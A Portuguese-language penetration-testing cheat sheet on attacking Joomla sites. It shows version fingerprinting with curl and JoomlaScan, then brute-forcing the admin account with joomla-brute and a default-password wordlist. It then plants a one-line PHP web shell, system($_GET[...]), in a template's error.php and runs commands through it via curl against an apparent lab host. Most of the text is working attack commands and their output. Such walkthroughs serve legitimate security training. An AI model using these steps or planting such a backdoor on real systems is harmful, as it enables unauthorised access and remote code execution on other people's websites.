# Joomla

## **Enumeração**

Podemos coletar impressões digitais do Joomla observando o código-fonte da página.

```bash
curl -s http://dev.site.local/ | grep Joomla
```

O arquivo `robots.txt`  para um site Joomla geralmente terá esta aparência:

```bash
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
```

Podemos imprimir a versão do Joomla se o arquivo `README.txt`  está presente.

```bash
curl -s http://dev.site.local/README.txt | head -n 5

1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```

Em certas instalações do Joomla, podemos imprimir a versão de arquivos JavaScript no diretório`media/system/js/`  ou navegando para `administrator/manifests/files/joomla.xml`.

```bash
curl -s http://dev.site.local/administrator/manifests/files/joomla.xml | xmllint --format -

<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <authorEmail>admin@joomla.org</authorEmail>
  <authorUrl>www.joomla.org</authorUrl>
  <copyright>(C) 2005 - 2019 Open Source Matters. All rights reserved</copyright>
  <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
  <version>3.9.4</version>
  <creationDate>March 2019</creationDate>
  <SNIP>
```

Utilizando [JoomlaScan](https://github.com/drego85/JoomlaScan)&#x20;

```bash
python2.7 joomlascan.py -u http://dev.site.local

-------------------------------------------
      	     Joomla Scan                  
   Usage: python joomlascan.py <target>    
    Version 0.5beta - Database Entries 1233
         created by Andrea Draghetti       
-------------------------------------------
Robots file found: 	 	 > http://dev.site.local/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs	 > http://dev.site.local/index.php?option=com_actionlogs
	 On the administrator components
Component found: com_admin	 > http://dev.site.local/index.php?option=com_admin
	 On the administrator components
Component found: com_ajax	 > http://dev.site.local/index.php?option=com_ajax
	 But possibly it is not active or protected
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_actionlogs/actionlogs.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_admin/admin.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_ajax/ajax.xml
	 Explorable Directory 	 > http://dev.site.local/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/components/com_admin/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_admin/
Component found: com_banners	 > http://dev.site.local/index.php?option=com_banners
	 But possibly it is not active or protected
	 Explorable Directory 	 > http://dev.site.local/components/com_ajax/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_ajax/
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_banners/banners.xml

<SNIP>
```

A conta de administrador padrão nas instalações do Joomla é `admin`, mas a senha é definida no momento da instalação. Podemos fazer brute force com [joomla-brute](https://github.com/ajnik/joomla-bruteforce)

```bash
python3 joomla-brute.py -u http://dev.site.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin
```

***

## Explora**ção**

Vamos fazer login no backend de destino em `http://dev.site.local/administrator`  usando `admin:admin.`&#x20;

A partir daqui, podemos clicar em `Templates` no canto inferior esquerdo abaixo `Configuration` para abrir o menu de modelos, Em seguida podemos clicar no nome de um modelo e **costumizar.**

Vamos escolher o `error.php` página. Adicionaremos uma linha única em PHP para obter a execução do código da seguinte maneira.

```bash
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
```

<figure><img src="https://3382562871-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F34rASyDxxBzeO9SzzIsI%2Fuploads%2FB7ZypY42bQejWtbqN9j5%2Fimage.png?alt=media&#x26;token=6b5180c2-ebdd-4b23-8e8b-6565ad4b5722" alt=""><figcaption></figcaption></figure>

Depois que isso estiver pronto, clique em `Save & Close` na parte superior e confirme a execução do código usando `CURL`.

```bash
curl -s http://dev.site.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
```

<br>